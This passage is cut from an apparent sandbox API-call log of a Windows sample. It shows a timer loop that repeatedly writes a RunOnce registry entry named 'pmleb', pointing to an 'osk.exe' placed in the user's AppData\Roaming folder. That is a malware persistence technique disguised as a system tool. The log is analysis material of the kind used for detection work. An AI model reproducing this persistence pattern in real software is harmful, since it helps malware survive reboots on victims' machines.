lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.304] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.304] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.304] RegCloseKey (hKey=0x280) returned 0x0 [0079.304] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.304] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.304] SetTimer (hWnd=0x20280, nIDEvent=0x2032, uElapse=0xa, lpTimerFunc=0x0) returned 0x2032 [0079.304] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.316] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.316] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.316] KillTimer (hWnd=0x20280, uIDEvent=0x2032) returned 1 [0079.316] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.316] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.317] IUnknown:Release (This=0x787518) returned 0x1 [0079.317] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.317] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.317] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.317] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.318] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0079.318] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.318] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x34 [0079.318] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.319] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0079.319] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.319] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.319] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0079.319] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.319] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.319] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.319] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.319] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.320] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.320] RegCloseKey (hKey=0x280) returned 0x0 [0079.320] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.320] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.320] SetTimer (hWnd=0x20280, nIDEvent=0x2033, uElapse=0xa, lpTimerFunc=0x0) returned 0x2033 [0079.320] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.331] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.331] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.332] KillTimer (hWnd=0x20280, uIDEvent=0x2033) returned 1 [0079.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.332] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.332] IUnknown:Release (This=0x787518) returned 0x1 [0079.332] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.332] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.332] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.333] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.333] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0079.333] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.333] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x35 [0079.333] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.334] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0079.334] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.334] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.334] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.334] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0079.334] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.334] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.334] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.335] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.335] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.335] RegCloseKey (hKey=0x280) returned 0x0 [0079.335] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.335] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.335] SetTimer (hWnd=0x20280, nIDEvent=0x2034, uElapse=0xa, lpTimerFunc=0x0) returned 0x2034 [0079.335] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.347] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.347] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.347] KillTimer (hWnd=0x20280, uIDEvent=0x2034) returned 1 [0079.348] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.348] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.348] IUnknown:Release (This=0x787518) returned 0x1 [0079.348] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.348] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.348] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.348] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.349] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0079.349] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.349] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x36 [0079.349] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.349] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0079.349] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.350] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.350] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.350] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.350] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.350] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.350] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 